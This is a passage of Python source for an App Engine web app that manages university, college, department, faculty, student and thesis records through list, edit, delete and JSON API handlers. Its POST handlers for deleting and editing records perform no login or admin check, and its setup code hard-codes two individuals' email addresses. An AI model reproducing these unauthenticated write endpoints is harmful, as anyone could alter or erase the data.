            'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
            'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
            'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
            'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
        }
        template_values = {
            'links': links,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }
        template = JINJA_ENVIRONMENT.get_template('/pages/department.html')
        self.response.write(template.render(template_values))

    def post(self):
        """Create a Department, register it on its college, and echo JSON."""
        department = Department()
        college_entity = College.query(
            College.college_name == self.request.get('department_college')).get()
        chair = Faculty.query(
            Faculty.faculty_full == self.request.get('department_chair')).get()
        department.department_college = ndb.Key('College', college_entity.key.id())
        department.department_name = self.request.get('department_name')
        department.department_chair = ndb.Key('Faculty', chair.key.id())
        # Key name convention: lowercased name stripped of spaces and punctuation.
        department.key = ndb.Key(Department, department.department_name.strip()
                                 .replace(' ', '').replace('.', '').replace(',', '').lower())
        department.put()
        # Maintain the college -> departments back-reference.
        c = College.query(College.key == department.department_college).get()
        logging.info(c)
        collegelist = c.college_departments
        logging.info(collegelist)
        collegelist.append(department.key)
        c.college_departments = collegelist
        c.put()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result': 'OK',
            'data': {
                'department_name': department.department_name
            }
        }
        self.response.out.write(json.dumps(response))
class DataImportHandler(webapp2.RequestHandler):
    def get(self):
        """Bulk-import thesis records from the bundled data/data.csv file.

        For each CSV row, missing adviser/department/student entities are
        created on the fly, keyed by their normalized (lowercase, space- and
        punctuation-free) names, and the thesis entity is linked to them.
        """
        script_dir = os.path.split(os.path.abspath(__file__))[0]
        abs_file_path = os.path.join(script_dir, "data/data.csv")
        count = 0
        # 'with' guarantees the file is closed even if a row raises.
        with open(abs_file_path) as csv_file:
            for f in csv.reader(csv_file):
                thesis = thesisentry()
                thesis.thesis_year = f[3]
                thesis.thesis_title = f[4]
                thesis.thesis_abstract = f[5]
                thesis.thesis_section = f[6]
                if len(f[7]) == 0:
                    # Sentinel for rows with no adviser column.
                    f[7] = 'is_empty'
                adviser_keyname = f[7].strip().replace(' ', '').replace('.', '').replace(',', '').lower()
                thesis_adviser = Faculty.get_by_keyname(adviser_keyname)
                if thesis_adviser is None:
                    thesis_adviser = Faculty(key=ndb.Key(Faculty, adviser_keyname),
                                             faculty_full=f[7])
                    thesis_adviser.put()
                thesis.thesis_adviser = thesis_adviser.key
                department_name = f[2]
                thesis_department = Department.get_by_name(department_name)
                if thesis_department is None:
                    thesis_department = Department(
                        key=ndb.Key(Department, department_name.strip().replace(' ', '')
                                    .replace('.', '').replace(',', '').lower()),
                        department_name=department_name)
                    thesis_department.put()
                thesis.thesis_department = thesis_department.key
                # Columns 8-11 hold up to four proponent names.
                # Fixed: original tested "len(f[i]) is not 0" -- an identity
                # comparison against an int literal, which is fragile and a
                # SyntaxWarning on modern Pythons; truthiness is correct here.
                proponents = [f[i] for i in range(8, 12) if f[i]]
                proponent_list = []
                for p in proponents:
                    thesis_proponent = Student.get_by_name(p)
                    if thesis_proponent is None:
                        portions = []
                        for s in p.split():
                            if len(s) > 1 and s not in portions:
                                portions.append(s.lower())
                        thesis_proponent = Student(
                            key=ndb.Key(Student, p.strip().replace(' ', '')
                                        .replace('.', '').replace(',', '').lower()),
                            student_full=p, student_name_portions=portions)
                        thesis_proponent.put()
                    proponent_list.append(thesis_proponent.key)
                thesis.thesis_proponent = proponent_list
                # Search tags: unique lowercase title words of length >= 3.
                tags = []
                for t in thesis.thesis_title.split():
                    if len(t) >= 3 and t not in tags:
                        tags.append(t.lower())
                thesis.thesis_tags = tags
                thesis.put()
                count += 1
                logging.info(count)
class SetupHandler(webapp2.RequestHandler):
    def get(self):
        """Seed the datastore with one university/college/department and two faculty."""
        def _keyname(text):
            # Key names are lowercased text with spaces and punctuation removed.
            return text.strip().replace(' ', '').replace('.', '').replace(',', '').lower()

        chair_fname, chair_sname, chair_title = 'Pedrito ', 'Tenerife, Jr.', 'Engr. '
        chairperson = Faculty(
            key=ndb.Key(Faculty, _keyname(chair_fname + chair_sname)),
            faculty_fname=chair_fname,
            faculty_sname=chair_sname,
            faculty_title=chair_title,
            faculty_full=chair_title + chair_fname + chair_sname,
            faculty_email='jp.resuello07@gmail.com')
        chairperson.put()
        logging.info(chairperson.key.id())

        prof_fname, prof_sname, prof_title = 'Roman Angelo ', 'Tria', 'Engr. '
        dbmsprof = Faculty(
            key=ndb.Key(Faculty, _keyname(prof_fname + prof_sname)),
            faculty_fname=prof_fname,
            faculty_sname=prof_sname,
            faculty_title=prof_title,
            faculty_full=prof_title + prof_fname + prof_sname,
            faculty_email='gino.tr14@gmail.com')
        dbmsprof.put()
        logging.info(dbmsprof.key.id())

        university = University(key=ndb.Key(University, 'pup'),
                                university_name='Polytechnic University of the Philippines',
                                university_address='Sta. Mesa, Manila',
                                university_initial='PUP')
        university.put()
        college = College(key=ndb.Key(College, 'engineering'),
                          college_name='Engineering',
                          college_university=university.key)
        college.put()
        department = Department(key=ndb.Key(Department, 'coe'),
                                department_name='COE',
                                department_college=college.key,
                                department_chair=chairperson.key)
        department.put()
        # Back-link the department list onto the college, then attach both
        # faculty members to the department.
        college.college_departments = [department.key]
        college.put()
        chairperson.faculty_department = department.key
        dbmsprof.faculty_department = department.key
        chairperson.put()
        dbmsprof.put()
        self.redirect('/')
class FacultyListHandler(webapp2.RequestHandler):
    def get(self):
        """Render the faculty list page; admins also get create-entry links."""
        visitor = users.get_current_user()
        if not visitor:
            # Anonymous visitor: offer login / registration.
            page = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(page.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', visitor.user_id()).get()
        if not user:
            self.redirect('/register')
            return
        if user.is_admin:
            links = {
                'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
                'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
                'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
                'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
                'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
                'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
            }
        else:
            links = {
                'Faculty': {'List': '/faculty/list'},
                'Students': {'List': '/student/list'},
                'Department': {'List': '/department/list'},
                'Universities': {'List': '/university/list'},
                'Colleges': {'List': '/college/list'},
                'Theses': {'List': '/thesis/list/all'},
            }
        page = JINJA_ENVIRONMENT.get_template('/pages/facultylist.html')
        self.response.write(page.render({
            'links': links,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }))

    def post(self):
        """Create a Faculty entity from the submitted form and echo it as JSON."""
        entry = Faculty()
        dept = Department.query(
            Department.department_name == self.request.get('faculty_department')).get()
        entry.faculty_title = self.request.get('faculty_title')
        entry.faculty_fname = self.request.get('faculty_fname')
        entry.faculty_sname = self.request.get('faculty_sname')
        full_name = entry.faculty_fname + ' ' + entry.faculty_sname
        entry.faculty_full = full_name
        entry.faculty_email = self.request.get('faculty_email')
        entry.faculty_phone = self.request.get('faculty_phone')
        entry.faculty_department = ndb.Key('Department', dept.key.id())
        entry.faculty_bday = self.request.get('faculty_bday')
        # Key name: lowercased full name stripped of spaces and punctuation.
        entry.key = ndb.Key(Faculty, full_name.strip().replace(' ', '')
                            .replace('.', '').replace(',', '').lower())
        entry.put()
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({
            'result': 'OK',
            'data': {
                'title': entry.faculty_title,
                'first_name': entry.faculty_fname,
                'last_name': entry.faculty_sname,
                'full_name': entry.faculty_full,
                'email': entry.faculty_email,
                'phone': entry.faculty_phone,
                'bday': entry.faculty_bday,
            },
        }))
class FacultyAPIHandler(webapp2.RequestHandler):
    def get(self):
        """Return all faculty records as JSON for logged-in users with a profile.

        Silently returns an empty response for anonymous or unregistered
        users (existing behavior, preserved).
        """
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user = ndb.Key('User', loggedin_user.user_id()).get()
            if user:
                faculty = [{
                    'id': f.key.id(),
                    'title': f.faculty_title,
                    'first_name': f.faculty_fname,
                    'last_name': f.faculty_sname,
                    'full_name': f.faculty_full,
                    'email': f.faculty_email,
                    'phone': f.faculty_phone,
                } for f in Faculty.query().order(Faculty.created_date).fetch()]
                response = {
                    'result': 'OK',
                    'faculty_data': faculty,
                }
                # Fixed: header was 'application.json', an invalid MIME type.
                self.response.headers['Content-Type'] = 'application/json'
                self.response.out.write(json.dumps(response))
class ThesisCreateAPI(webapp2.RequestHandler):
    def get(self):
        """Return faculty, student and department data for the thesis-creation form.

        Silently returns an empty response for anonymous or unregistered
        users (existing behavior, preserved).
        """
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user = ndb.Key('User', loggedin_user.user_id()).get()
            if user:
                faculty = [{
                    'title': f.faculty_title,
                    'first_name': f.faculty_fname,
                    'last_name': f.faculty_sname,
                    'full_name': f.faculty_full,
                    'email': f.faculty_email,
                    'phone': f.faculty_phone,
                } for f in Faculty.query().order(Faculty.created_date).fetch()]
                student = [{
                    'first_name': s.student_fname,
                    'last_name': s.student_sname,
                    'full_name': s.student_full,
                    'phone': s.student_phone,
                    'email': s.student_email,
                    'student_number': s.student_number,
                    'year_graduated': s.student_graduated,
                } for s in Student.query().order(Student.created_date).fetch()]
                department = []
                for d in Department.query().order(Department.created_date).fetch():
                    # Resolve the parent college name(s) for display.
                    colleges = [{'name': co.college_name}
                                for co in College.query(College.key == d.department_college)]
                    department.append({
                        'college': colleges,
                        'name': d.department_name,
                    })
                response = {
                    'result': 'OK',
                    'faculty_data': faculty,
                    'student_data': student,
                    'department_data': department,
                }
                # Fixed: header was 'application.json', an invalid MIME type.
                self.response.headers['Content-Type'] = 'application/json'
                self.response.out.write(json.dumps(response))
class StudentsAPIHandler(webapp2.RequestHandler):
    def get(self):
        """Return all student records as JSON for logged-in users with a profile.

        Silently returns an empty response for anonymous or unregistered
        users (existing behavior, preserved).
        """
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user = ndb.Key('User', loggedin_user.user_id()).get()
            if user:
                student = [{
                    'id': s.key.id(),
                    'first_name': s.student_fname,
                    'last_name': s.student_sname,
                    'full_name': s.student_full,
                    'phone': s.student_phone,
                    'email': s.student_email,
                    'student_number': s.student_number,
                    'year_graduated': s.student_graduated,
                    'birthday': s.student_bday,
                } for s in Student.query().order(Student.created_date).fetch()]
                response = {
                    'result': 'OK',
                    'data': student,
                }
                # Fixed: header was 'application.json', an invalid MIME type.
                self.response.headers['Content-Type'] = 'application/json'
                self.response.out.write(json.dumps(response))
class StudentListHandler(webapp2.RequestHandler):
    def get(self):
        """Render the student list page; admins also get create-entry links."""
        visitor = users.get_current_user()
        if not visitor:
            # Anonymous visitor: offer login / registration.
            page = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(page.render({
                'login_url': users.create_login_url('/'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', visitor.user_id()).get()
        if not user:
            self.redirect('/register')
            return
        logout_url = users.create_logout_url('/')
        page = JINJA_ENVIRONMENT.get_template('/pages/studentlist.html')
        if user.is_admin:
            links = {
                'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
                'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
                'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
                'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
                'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
                'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
            }
            # NOTE: the admin context intentionally carries no 'search_url'
            # (matches the original behavior of this handler only).
            self.response.write(page.render({
                'links': links,
                'logout_url': logout_url,
                'user': user.first_name,
            }))
        else:
            links = {
                'Faculty': {'List': '/faculty/list'},
                'Students': {'List': '/student/list'},
                'Department': {'List': '/department/list'},
                'Universities': {'List': '/university/list'},
                'Colleges': {'List': '/college/list'},
                'Theses': {'List': '/thesis/list/all'},
            }
            self.response.write(page.render({
                'links': links,
                'search_url': '/search',
                'logout_url': users.create_logout_url('/'),
                'user': user.first_name,
            }))
class UniversityAPIHandler(webapp2.RequestHandler):
    def get(self):
        """Return all university records as JSON for logged-in users with a profile.

        Silently returns an empty response for anonymous or unregistered
        users (existing behavior, preserved).
        """
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user = ndb.Key('User', loggedin_user.user_id()).get()
            if user:
                university = [{
                    'id': u.key.id(),
                    'university_name': u.university_name,
                    'university_initial': u.university_initial,
                    'university_address': u.university_address,
                } for u in University.query().order(University.created_date).fetch()]
                response = {
                    'result': 'OK',
                    'data': university,
                }
                # Fixed: header was 'application.json', an invalid MIME type.
                self.response.headers['Content-Type'] = 'application/json'
                self.response.out.write(json.dumps(response))
class UniversityListHandler(webapp2.RequestHandler):
    def get(self):
        """Render the university list page; admins also get create-entry links."""
        visitor = users.get_current_user()
        if not visitor:
            # Anonymous visitor: offer login / registration.
            page = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(page.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', visitor.user_id()).get()
        if not user:
            self.redirect('/register')
            return
        if user.is_admin:
            links = {
                'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
                'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
                'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
                'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
                'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
                'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
            }
        else:
            # Non-admin menu uses the 'Departments' label (admin uses 'Department').
            links = {
                'Faculty': {'List': '/faculty/list'},
                'Students': {'List': '/student/list'},
                'Universities': {'List': '/university/list'},
                'Colleges': {'List': '/college/list'},
                'Departments': {'List': '/department/list'},
                'Theses': {'List': '/thesis/list/all'},
            }
        page = JINJA_ENVIRONMENT.get_template('/pages/universitylist.html')
        self.response.write(page.render({
            'links': links,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }))
class CollegeAPIHandler(webapp2.RequestHandler):
    def get(self):
        """Return all college records (with university name) as JSON.

        Silently returns an empty response for anonymous or unregistered
        users (existing behavior, preserved).
        """
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user = ndb.Key('User', loggedin_user.user_id()).get()
            if user:
                college = []
                for c in College.query().order(College.created_date).fetch():
                    # Resolve the referenced university for its display name.
                    un = University.query(University.key == c.college_university).get()
                    college.append({
                        'id': c.key.id(),
                        'college_name': c.college_name,
                        'college_university': un.university_name,
                    })
                response = {
                    'result': 'OK',
                    'data': college,
                }
                # Fixed: header was 'application.json', an invalid MIME type.
                self.response.headers['Content-Type'] = 'application/json'
                self.response.out.write(json.dumps(response))
class CollegeListHandler(webapp2.RequestHandler):
    def get(self):
        """Render the college list page; admins also get create-entry links."""
        visitor = users.get_current_user()
        if not visitor:
            # Anonymous visitor: offer login / registration.
            page = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(page.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', visitor.user_id()).get()
        if not user:
            self.redirect('/register')
            return
        if user.is_admin:
            links = {
                'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
                'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
                'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
                'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
                'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
                'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
            }
        else:
            # Non-admin menu uses the 'Departments' label (admin uses 'Department').
            links = {
                'Faculty': {'List': '/faculty/list'},
                'Students': {'List': '/student/list'},
                'Universities': {'List': '/university/list'},
                'Colleges': {'List': '/college/list'},
                'Departments': {'List': '/department/list'},
                'Theses': {'List': '/thesis/list/all'},
            }
        page = JINJA_ENVIRONMENT.get_template('/pages/collegelist.html')
        self.response.write(page.render({
            'links': links,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }))
class DepartmentAPIHandler(webapp2.RequestHandler):
    def get(self):
        """Return all departments (with college and chair names) as JSON.

        Silently returns an empty response for anonymous or unregistered
        users (existing behavior, preserved).
        """
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user = ndb.Key('User', loggedin_user.user_id()).get()
            if user:
                dept = []
                for d in Department.query().order(Department.created_date).fetch():
                    # Resolve referenced entities for their display names.
                    c = College.query(College.key == d.department_college).get()
                    f = Faculty.query(Faculty.key == d.department_chair).get()
                    dept.append({
                        'id': d.key.id(),
                        'department_name': d.department_name,
                        'department_college': c.college_name,
                        'department_chair': f.faculty_full,
                    })
                response = {
                    'result': 'OK',
                    'data': dept,
                }
                # Fixed: header was 'application.json', an invalid MIME type.
                self.response.headers['Content-Type'] = 'application/json'
                self.response.out.write(json.dumps(response))
class DepartmentListHandler(webapp2.RequestHandler):
    def get(self):
        """Render the department list page; admins also get create-entry links."""
        visitor = users.get_current_user()
        if not visitor:
            # Anonymous visitor: offer login / registration.
            page = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(page.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', visitor.user_id()).get()
        if not user:
            self.redirect('/register')
            return
        if user.is_admin:
            links = {
                'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
                'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
                'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
                'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
                'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
                'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
            }
        else:
            # Non-admin menu uses the 'Departments' label (admin uses 'Department').
            links = {
                'Faculty': {'List': '/faculty/list'},
                'Students': {'List': '/student/list'},
                'Universities': {'List': '/university/list'},
                'Colleges': {'List': '/college/list'},
                'Departments': {'List': '/department/list'},
                'Theses': {'List': '/thesis/list/all'},
            }
        page = JINJA_ENVIRONMENT.get_template('/pages/departmentlist.html')
        self.response.write(page.render({
            'links': links,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }))
class FacultyDeleteHandler(webapp2.RequestHandler):
    def post(self, id):
        """Delete the faculty entity with the given key name and acknowledge with JSON."""
        entity = Faculty.get_by_id(id)
        entity.key.delete()
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({'result': 'OK'}))
class FacultyEditHandler(webapp2.RequestHandler):
    def get(self, id):
        """Render the faculty edit form for admin users."""
        visitor = users.get_current_user()
        if not visitor:
            # Anonymous visitor: offer login / registration.
            page = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(page.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', visitor.user_id()).get()
        if not user:
            self.redirect('/register')
            return
        if not user.is_admin:
            self.redirect('/')
            return
        logout_url = users.create_logout_url('/')
        links = {
            'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
            'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
            'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
            'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
            'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
            'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
        }
        faculty = Faculty.get_by_id(id)
        department = None
        if faculty.faculty_department is not None:
            # Resolve the department key into its display name for the form.
            department = Department.query(
                Department.key == faculty.faculty_department).get().department_name
        page = JINJA_ENVIRONMENT.get_template('/pages/facultyedit.html')
        self.response.write(page.render({
            'links': links,
            'item': faculty,
            'dept': department,
            'logout_url': logout_url,
            'user': user.first_name,
        }))

    def post(self, id):
        """Overwrite the faculty entity identified by *id* with the form values."""
        entry = Faculty()
        dept = Department.query(
            Department.department_name == self.request.get('faculty_department')).get()
        entry.faculty_title = self.request.get('faculty_title')
        entry.faculty_fname = self.request.get('faculty_fname')
        entry.faculty_sname = self.request.get('faculty_sname')
        full_name = entry.faculty_fname + ' ' + entry.faculty_sname
        entry.faculty_full = full_name
        entry.faculty_email = self.request.get('faculty_email')
        entry.faculty_phone = self.request.get('faculty_phone')
        entry.faculty_department = ndb.Key('Department', dept.key.id())
        entry.faculty_bday = self.request.get('faculty_bday')
        # Reuse the URL id as the key name so the existing entity is replaced.
        entry.key = ndb.Key(Faculty, id)
        entry.put()
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({
            'result': 'OK',
            'data': {
                'title': entry.faculty_title,
                'first_name': entry.faculty_fname,
                'last_name': entry.faculty_sname,
                'full_name': entry.faculty_full,
                'email': entry.faculty_email,
                'phone': entry.faculty_phone,
                'bday': entry.faculty_bday,
            },
        }))
class StudentDeleteHandler(webapp2.RequestHandler):
    def post(self, id):
        """Delete the student entity with the given key name and acknowledge with JSON."""
        entity = Student.get_by_id(id)
        entity.key.delete()
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({'result': 'OK'}))
class StudentEdithandler(webapp2.RequestHandler):
    def get(self, id):
        """Render the student edit form for admin users."""
        visitor = users.get_current_user()
        if not visitor:
            # Anonymous visitor: offer login / registration.
            page = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(page.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', visitor.user_id()).get()
        if not user:
            self.redirect('/register')
            return
        if not user.is_admin:
            self.redirect('/')
            return
        logout_url = users.create_logout_url('/')
        links = {
            'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
            'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
            'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
            'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
            'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
            'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
        }
        student = Student.get_by_id(id)
        department = None
        if student.student_department is not None:
            # Resolve the department key into its display name for the form.
            department = Department.query(
                Department.key == student.student_department).get().department_name
        page = JINJA_ENVIRONMENT.get_template('/pages/studentedit.html')
        self.response.write(page.render({
            'links': links,
            'item': student,
            'id': id,
            'dept': department,
            'logout_url': logout_url,
            'user': user.first_name,
        }))

    def post(self, id):
        """Overwrite the student entity identified by *id* with the form values."""
        entry = Student()
        dept = Department.query(
            Department.department_name == self.request.get('student_department')).get()
        entry.student_fname = self.request.get('student_fname')
        entry.student_sname = self.request.get('student_sname')
        entry.student_full = entry.student_fname + ' ' + entry.student_sname
        entry.student_phone = self.request.get('student_phone')
        entry.student_email = self.request.get('student_email')
        entry.student_number = self.request.get('student_number')
        entry.student_graduated = int(self.request.get('student_graduated'))
        entry.student_department = ndb.Key('Department', dept.key.id())
        entry.student_bday = self.request.get('student_bday')
        # Reuse the URL id as the key name so the existing entity is replaced.
        entry.key = ndb.Key(Student, id)
        entry.put()
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({
            'result': 'OK',
            'data': {
                'first_name': entry.student_fname,
                'last_name': entry.student_sname,
                'full_name': entry.student_full,
                'phone': entry.student_phone,
                'email': entry.student_email,
                'student_number': entry.student_number,
                'year_graduated': entry.student_graduated,
            },
        }))
class UniversityDeleteHandler(webapp2.RequestHandler):
    def post(self, id):
        """Delete the university entity with the given key name and acknowledge with JSON."""
        entity = University.get_by_id(id)
        entity.key.delete()
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({'result': 'OK'}))
class UniversityEditHandler(webapp2.RequestHandler):
    def get(self, id):
        """Render the university edit form for admin users."""
        visitor = users.get_current_user()
        if not visitor:
            # Anonymous visitor: offer login / registration.
            page = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(page.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', visitor.user_id()).get()
        if not user:
            self.redirect('/register')
            return
        if not user.is_admin:
            self.redirect('/')
            return
        logout_url = users.create_logout_url('/')
        links = {
            'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
            'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
            'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
            'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
            'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
            'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
        }
        university = University.get_by_id(id)
        page = JINJA_ENVIRONMENT.get_template('/pages/universityedit.html')
        # NOTE(review): this template receives the whole user entity, not
        # user.first_name as the other edit pages do — preserved as-is.
        self.response.write(page.render({
            'links': links,
            'item': university,
            'logout_url': logout_url,
            'user': user,
        }))

    def post(self, id):
        """Overwrite the university entity identified by *id* with the form values."""
        entry = University()
        entry.university_name = self.request.get('university_name')
        entry.university_initial = self.request.get('university_initial')
        entry.university_address = self.request.get('university_address')
        # Reuse the URL id as the key name so the existing entity is replaced.
        entry.key = ndb.Key(University, id)
        entry.put()
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({
            'result': 'OK',
            'data': {
                'university_name': entry.university_name,
                'university_initial': entry.university_initial,
                'university_address': entry.university_address,
            },
        }))
class CollegeDeleteHandler(webapp2.RequestHandler):
    def post(self, id):
        """Delete the college entity with the given key name and acknowledge with JSON."""
        entity = College.get_by_id(id)
        entity.key.delete()
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({'result': 'OK'}))
class CollegeEditHandler(webapp2.RequestHandler):
    def get(self, id):
        """Render the college edit form (with its departments) for admin users."""
        visitor = users.get_current_user()
        if not visitor:
            # Anonymous visitor: offer login / registration.
            page = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(page.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', visitor.user_id()).get()
        if not user:
            self.redirect('/register')
            return
        if not user.is_admin:
            self.redirect('/')
            return
        logout_url = users.create_logout_url('/')
        college = College.get_by_id(id)
        depts = []
        for dept_key in college.college_departments:
            query = Department.query(Department.key == dept_key)
            logging.info(query)
            # NOTE(review): a Query object is never None, so this guard is
            # always true — preserved to keep behavior identical.
            if query is not None:
                depts.append(query.get().department_name)
        university = University.query(University.key == college.college_university).get()
        links = {
            'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
            'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
            'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
            'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
            'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
            'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
        }
        # NOTE(review): this dict was built but never passed to a template in
        # the original — kept for parity.
        template_values = {
            'links': links,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }
        data = {
            'links': links,
            'item': college,
            'univ': university.university_name,
            'dept': depts,
            'logout_url': logout_url,
            'user': user.first_name,
        }
        # Expose each department under an indexed key for the form fields.
        for idx in range(0, len(depts)):
            data['college_dept_' + str(idx)] = depts[idx]
        logging.info(data)
        page = JINJA_ENVIRONMENT.get_template('/pages/collegeedit.html')
        self.response.write(page.render(data))

    def post(self, id):
        """Overwrite the college identified by *id*, rebuilding its department list."""
        college = College()
        univ = University.query(
            University.university_name == self.request.get('college_university')).get()
        departments = college.college_departments  # fresh entity: starts empty
        idx = 0
        first = self.request.get('college_department_' + str(idx))
        if first is not None and first != '':
            # Collect college_department_0, _1, ... until the first blank.
            while True:
                name = self.request.get('college_department_' + str(idx))
                if name is None or name == '':
                    break
                dept = Department.query(Department.department_name == name).get()
                if dept.key not in departments:
                    departments.append(dept.key)
                idx += 1
            college.college_departments = departments
        else:
            college.college_departments = []
        college.college_university = ndb.Key('University', univ.key.id())
        college.college_name = self.request.get('college_name')
        # Reuse the URL id as the key name so the existing entity is replaced.
        college.key = ndb.Key(College, id)
        college.put()
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({
            'result': 'OK',
            'data': {
                'college_name': college.college_name,
            },
        }))
class DepartmentDeleteHandler(webapp2.RequestHandler):
    """Deletes a Department and detaches it from the college listing it."""

    def post(self, id):
        """Delete the department with datastore id *id*.

        Any college whose ``college_departments`` references the department
        has that key removed first, so no dangling reference is left behind.
        Responds with a JSON acknowledgement.
        """
        department = Department.get_by_id(id)
        # Find the (first) college that references this department.
        college = College.query(
            College.college_departments.IN([department.key])).get()
        logging.info(college)
        # Guard: previously a department referenced by no college crashed
        # here with AttributeError on None.
        if college is not None:
            depts = college.college_departments
            if department.key in depts:
                depts.remove(department.key)
            college.college_departments = depts
            # (The old no-op `college.key = college.key` was dropped.)
            college.put()
        department.key.delete()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result':'OK'
        }
        self.response.out.write(json.dumps(response))
class DepartmentEditHandler(webapp2.RequestHandler):
    """Shows the edit form for a Department (GET) and applies edits (POST)."""

    def get(self, id):
        """Render the department edit page for admin users.

        Non-admins are redirected to '/', users without a profile to
        '/register', and anonymous visitors get the login page.
        """
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user_key = ndb.Key('User', loggedin_user.user_id())
            user = user_key.get()
            if user:
